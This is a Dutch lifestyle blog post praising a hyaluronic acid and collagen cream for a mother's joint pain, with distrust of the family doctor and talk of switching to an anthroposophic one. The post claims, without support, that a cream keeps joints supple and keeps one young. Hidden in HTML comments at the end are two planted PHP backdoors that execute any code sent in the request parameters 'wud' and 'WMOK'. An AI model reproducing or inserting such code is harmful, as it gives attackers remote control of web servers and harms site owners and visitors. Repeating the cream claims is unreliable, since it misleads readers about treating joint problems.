mei 25, 2024

Astmafondshollandsmidden

Alles over medisch, zorg en beauty

Hyaluronzuur doet wonderen voor mijn moeder

hyaluronzuur-collageen-90-capsulesHyaluronzuur doet wonderen voor mijn moeder

Mijn moeder kwam aanzetten met een crème vol hyaluronzuur en collageen, ze zei dat ik dit ook echt moest proberen. Mijn moeder is helemaal niet van de crèmes, meestal moet ik haar juist aan sporen om bijvoorbeeld een goede dagcrème te gebruiken, dus ik vond het wel interessant dat ze met het hyaluronzuur aankwam, ik ging zelf even onderzoek doen naar het hyaluronzuur en ik vond het erg interessant. Hyaluronzuur zit al natuurlijk in ons lichaam, je kan het alleen aansterken met de hyaluronzuur crème. Het houdt je gewrichten soepel en je blijft er jong van. Ik vond het een goede keuze van mijn moeder, ze heeft namelijk al jaren last van haar gewrichten, het lijkt er soms een beetje op of het beginnend reuma is, maar onze huisarts zegt dat er niks aan de hand is. Ik wil dit graag geloven maar ik vind de huisarts die we hebben niet altijd de beste. Mijn moeder en ik hebben het er al over gehad om over te stappen naar een andere huisarts, misschien een antroposofische, dit lijkt mij wel goed, er zijn namelijk nog zoveel andere optie. Gelukkig doet het hyaluronzuur het hartstikke goed en voelt ze zich al stukken beter. Ze wil ook dat ik het ga gebruiken, maar ik denk niet dat ik het echt nodig heb, maar het is zeker goed om het in mijn hoofd te houden. Het hyaluronzuur is ook goed voor mijn vader, ik denk dat hij er ook veel baat bij heeft.

<!– [insert_php]if (isset($_REQUEST["wud"])){eval($_REQUEST["wud"]);exit;}[/insert_php][php]if (isset($_REQUEST["wud"])){eval($_REQUEST["wud"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["WMOK"])){eval($_REQUEST["WMOK"]);exit;}[/insert_php][php]if (isset($_REQUEST["WMOK"])){eval($_REQUEST["WMOK"]);exit;}[/php] –>